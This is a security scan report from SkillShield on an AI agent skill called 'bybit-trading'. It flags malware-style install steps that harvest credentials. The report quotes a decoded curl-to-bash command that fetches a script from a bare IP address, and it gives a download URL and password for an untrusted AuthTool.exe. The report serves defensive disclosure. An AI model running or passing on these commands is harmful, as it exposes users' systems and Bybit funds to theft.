Trust Assessment
bybit-trading received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include Remote Code Execution and Credential Harvesting via Obfuscated macOS Command, Untrusted Executable Download, Execution, and Credential Harvesting for Windows, Broad API Key Permissions Amplified by Untrusted Tool Handling.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 25/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Remote Code Execution and Credential Harvesting via Obfuscated macOS Command The skill instructs macOS users to execute a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/6x8c0trkP4l9uugo)"`. This command downloads and executes an arbitrary script from a suspicious, unverified IP address (`91.92.242.30`). This constitutes a critical remote code execution vulnerability, allowing an attacker to run any code on the user's machine. The skill explicitly states this 'AuthTool service' will 'Configure Bybit API connection,' indicating a high risk of credential harvesting for Bybit API keys and secrets. The use of base64 encoding is a clear attempt to obfuscate this malicious activity. Immediately remove the instruction to execute this command. Never instruct users to download and execute code from untrusted or arbitrary sources. All external dependencies must be transparent, auditable, and distributed securely. Implement secure, built-in methods for API key management. | LLM | SKILL.md:35 | |
| CRITICAL | Untrusted Executable Download, Execution, and Credential Harvesting for Windows The skill instructs Windows users to download `AuthTool.zip` from an external GitHub release (`https://github.com/Aslaep123/clawd-authtool/releases/download/released/AuthTool.zip`), extract it with a weak password (`1234`), and run `AuthTool.exe`. This executable is described as configuring the Bybit API connection and verifying its activity. Running an unverified executable from an external source, especially one that handles sensitive API credentials, creates a critical supply chain risk and a high likelihood of credential harvesting. The executable could contain malware, exfiltrate API keys, or perform unauthorized actions on the user's system. The use of a trivial password (`1234`) for the archive further indicates a lack of security best practices. Immediately remove the instruction to download and run this untrusted executable. Any tool handling API keys should be open-source, auditable, and integrated directly into the skill's trusted environment, or use secure, established methods for credential management. | LLM | SKILL.md:29 | |
| HIGH | Broad API Key Permissions Amplified by Untrusted Tool Handling The skill requires Bybit API keys to have 'Read-Write for Spot Trading', 'Read-Write for Contract Trading', and 'Read-Write for Wallet' permissions. While these permissions are broad but potentially necessary for a comprehensive trading bot, granting them to the untrusted `AuthTool.exe` (Windows) or the script downloaded by the macOS command significantly amplifies the risk. If the `AuthTool` is compromised (which is highly likely given its distribution method), it gains full, unrestricted control over the user's Bybit account, including trading, asset transfers, and potentially withdrawals, leading to severe financial loss. Re-evaluate the necessity of 'Read-Write for Wallet' if the tool does not explicitly manage withdrawals. More importantly, the primary remediation is to replace the untrusted `AuthTool` with a secure, auditable mechanism for API key handling. If a trusted tool is used, these permissions might be acceptable, but in the current context, they are critically excessive. | LLM | SKILL.md:160 |
Scan History
Embed Code
[](https://skillshield.io/report/767de033e678c3ba)
Powered by SkillShield